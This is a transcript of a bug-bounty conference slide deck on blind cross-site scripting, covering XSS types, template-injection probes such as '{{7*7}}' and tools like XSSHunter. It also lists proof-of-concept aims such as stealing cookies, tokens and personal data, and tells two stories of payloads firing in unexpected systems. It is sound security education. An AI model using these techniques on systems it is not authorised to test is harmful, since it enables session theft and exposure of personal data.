Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Getting Blindly Lucky

Avatar for JR0ch17 JR0ch17
November 01, 2020

Getting Blindly Lucky

Avatar for JR0ch17

JR0ch17

November 01, 2020
Tweet

More Decks by JR0ch17

Other Decks in Technology

Transcript

  1. {{ agenda }} • What is XSS? • & •

    Blind XSS Stories • Questions/Comments
  2. {{ XSS }} Cross-Site Scripting (XSS) attacks are a type

    of injection, in which malicious scripts are injected into trusted websites.* • Malicious Script • Types of XSS • Reflected • DOM => postMessage() • Stored => Blind * https://owasp.org/www-community/attacks/xss/
  3. {{ XSS PoCs}} • Typical PoCs • Steal CSRF Tokens

    • Steal Cookies (if not HttpOnly) • Steal localStorage and sessionStorage tokens • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (ie. PII) • SSRF if found in HTML to PDF converter
  4. {{ }} MVC client-side framework built by Google • XSS

    • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/navb4jh3/
  5. {{ }} “Progressive” MVVM client-side framework for building UIs and

    SPAs • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/s6b3dy25/
  6. {{ Blind XSS }} Variant of a Stored XSS. The

    payload is saved and executed in a separate part of the application (ie. Admin panel) or in a completely different application (internal application) • Tools • XSSHunter • Sleepy Puppy • Burp Collaborator
  7. {{ HackerOne Hacktivity Blind XSS Reports }} All blind XSS

    payloads from HackerOne’s Hacktivity are from an HTML context (ie. <script> tag) Not a single one from template injection
  8. {{ Blind XSS Story #1 }} A Google search lead

    to Apple’s QuickLook feature QuickLook is a way to preview a file to view its contents instead of having to open the file
  9. {{ Blind XSS Story #1 }} When an XSS triggers

    with XSSHunter, it captures the DOM...
  10. {{ Blind XSS Story #1 }} Turns out the CSV

    file contained a LOT of PII...
  11. {{ Blind XSS Story #2 }} Someone had filed a

    complaint on my user!!! The complaint was forwarded as an email The XSS triggered in the email system!